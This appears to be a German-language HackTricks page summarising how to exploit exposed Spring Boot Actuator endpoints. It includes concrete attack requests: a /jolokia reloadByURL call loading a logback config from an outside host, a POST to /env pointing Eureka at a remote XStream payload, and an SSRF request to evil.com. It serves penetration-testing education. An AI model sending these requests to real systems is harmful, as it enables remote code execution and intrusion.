mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-21 10:33:36 +00:00
91 lines
5.9 KiB
Markdown
91 lines
5.9 KiB
Markdown
# Spring Actuators
|
|
|
|
<details>
|
|
|
|
<summary><strong>Lernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Andere Möglichkeiten, HackTricks zu unterstützen:
|
|
|
|
* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
|
|
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
|
|
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.
|
|
|
|
</details>
|
|
|
|
## **Spring Auth Bypass**
|
|
|
|
<figure><img src="../../.gitbook/assets/image (5) (2).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
**Von** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)\*\*\*\*
|
|
|
|
## Ausnutzen von Spring Boot Actuators
|
|
|
|
**Überprüfen Sie den Originalbeitrag von** [**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]
|
|
|
|
### **Hauptpunkte:**
|
|
|
|
- Spring Boot Actuators registrieren Endpunkte wie `/health`, `/trace`, `/beans`, `/env` usw. In den Versionen 1 bis 1.4 sind diese Endpunkte ohne Authentifizierung zugänglich. Ab Version 1.5 sind nur `/health` und `/info` standardmäßig nicht sensitiv, aber Entwickler deaktivieren diese Sicherheit oft.
|
|
- Bestimmte Actuator-Endpunkte können sensible Daten offenlegen oder schädliche Aktionen ermöglichen:
|
|
- `/dump`, `/trace`, `/logfile`, `/shutdown`, `/mappings`, `/env`, `/actuator/env`, `/restart` und `/heapdump`.
|
|
- In Spring Boot 1.x sind die Aktuatoren unter der Root-URL registriert, während sie in 2.x unter dem Basispfad `/actuator/` liegen.
|
|
|
|
### **Ausnutzungstechniken:**
|
|
|
|
1. **Remote Code Execution über '/jolokia'**:
|
|
- Der Aktuator-Endpunkt `/jolokia` gibt die Jolokia-Bibliothek frei, die den HTTP-Zugriff auf MBeans ermöglicht.
|
|
- Die Aktion `reloadByURL` kann ausgenutzt werden, um Logging-Konfigurationen von einer externen URL neu zu laden, was zu blindem XXE oder Remote Code Execution über speziell erstellte XML-Konfigurationen führen kann.
|
|
- Beispiel-Exploit-URL: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
|
|
|
|
2. **Konfigurationsänderung über '/env'**:
|
|
- Wenn Spring Cloud Libraries vorhanden sind, ermöglicht der Endpunkt `/env` die Änderung von Umgebungseigenschaften.
|
|
- Eigenschaften können manipuliert werden, um Schwachstellen auszunutzen, wie z.B. die XStream-Deserialisierungsschwachstelle in der Eureka serviceURL.
|
|
- Beispiel-Exploit-POST-Anfrage:
|
|
|
|
```
|
|
POST /env HTTP/1.1
|
|
Host: 127.0.0.1:8090
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 65
|
|
|
|
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
|
|
```
|
|
|
|
3. **Weitere nützliche Einstellungen**:
|
|
- Eigenschaften wie `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url` und `spring.datasource.tomcat.max-active` können für verschiedene Exploits manipuliert werden, wie z.B. SQL-Injection oder Änderung von Datenbankverbindungszeichenketten.
|
|
|
|
### **Zusätzliche Informationen:**
|
|
|
|
- Eine umfassende Liste der Standard-Aktuatoren finden Sie [hier](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt).
|
|
- Der Endpunkt `/env` in Spring Boot 2.x verwendet JSON-Format für die Änderung von Eigenschaften, aber das allgemeine Konzept bleibt gleich.
|
|
|
|
### **Verwandte Themen:**
|
|
|
|
1. **Env + H2 RCE**:
|
|
- Details zur Ausnutzung der Kombination aus dem Endpunkt `/env` und der H2-Datenbank finden Sie [hier](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).
|
|
|
|
2. **SSRF auf Spring Boot durch falsche Interpretation des Pfadnamens**:
|
|
- Die Handhabung von Matrixparametern (`;`) in HTTP-Pfadnamen durch das Spring-Framework kann für Server-seitige Anfragenfälschung (SSRF) ausgenutzt werden.
|
|
- Beispiel-Exploit-Anfrage:
|
|
|
|
```http
|
|
GET ;@evil.com/url HTTP/1.1
|
|
Host: target.com
|
|
Connection: close
|
|
```
|
|
|
|
|
|
<details>
|
|
|
|
<summary><strong>Lernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Andere Möglichkeiten, HackTricks zu unterstützen:
|
|
|
|
* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
|
|
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
|
|
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.
|
|
|
|
</details>
|